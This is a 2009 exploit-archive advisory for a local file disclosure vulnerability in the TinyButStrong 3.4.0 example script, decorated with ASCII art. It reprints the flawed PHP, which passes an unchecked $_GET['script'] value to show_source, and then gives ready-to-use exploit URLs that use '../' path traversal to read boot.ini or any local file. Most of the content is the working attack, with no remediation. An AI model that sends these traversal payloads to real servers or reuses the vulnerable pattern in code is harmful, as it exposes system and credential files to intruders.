[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability
# Published : 2009-05-13
# Author : ahmadbady
# Previous Title : MRCGIGUY Top Sites 1.0.0 Insecure Cookie Handling Vuln
# Next Title : Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability
( ' )-. ,~'`-.
,~' ` ' ) ) _( _) )
( ( .--.===.--. ( ` ' )
`.%%. .#`. `-'`~~=~'
/%%/ ##
|%%/ local ##|
|%%| |##|.,-.
%%| file |##/ )_
% /#/ ( `' )
% include /#/( , -'`-.
,~-. `% /#'( ( ') )
( ) )_ `__|__/' `~-~=--~~='
( ` ') ) [-=-=-]
(_(_.~~~' |_|/
[***]
|||/
(o o)
-=-=-=-==-=-=-=-=-=-=-=+-oooO--(_)-------+-=-=-=-=-=-=-
| |
| |
script:TinyButStrong version 3.4.0
-------------------------------------------------
Author: ahmadbady
email: kivi_hacker666@yahoo.com
my site:Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.tinybutstrong.com/download/download.php?file=tbs_us.zip&sid=2
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--=
vul:/examples/tbs_us_examples_0view.php
<?php
if (!isset($_GET)) $_GET=&$HTTP_GET_VARS ;
show_source('tbs_us_examples_'.$_GET['script']) ;
exit ;
?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-
xpl:
path/examples/tbs_us_examples_0view.php?script=../../../../boot.ini
path/examples/tbs_us_examples_0view.php?script=[local_file]
-=-=-=-=-=-=-=-=-=-=-=-+------------Ooo--+-=-=-=-=-=-=-=-=-=-=-=-=-
|__|__|
|| ||
OoO OoO
# www.Syue.com [2009-05-13]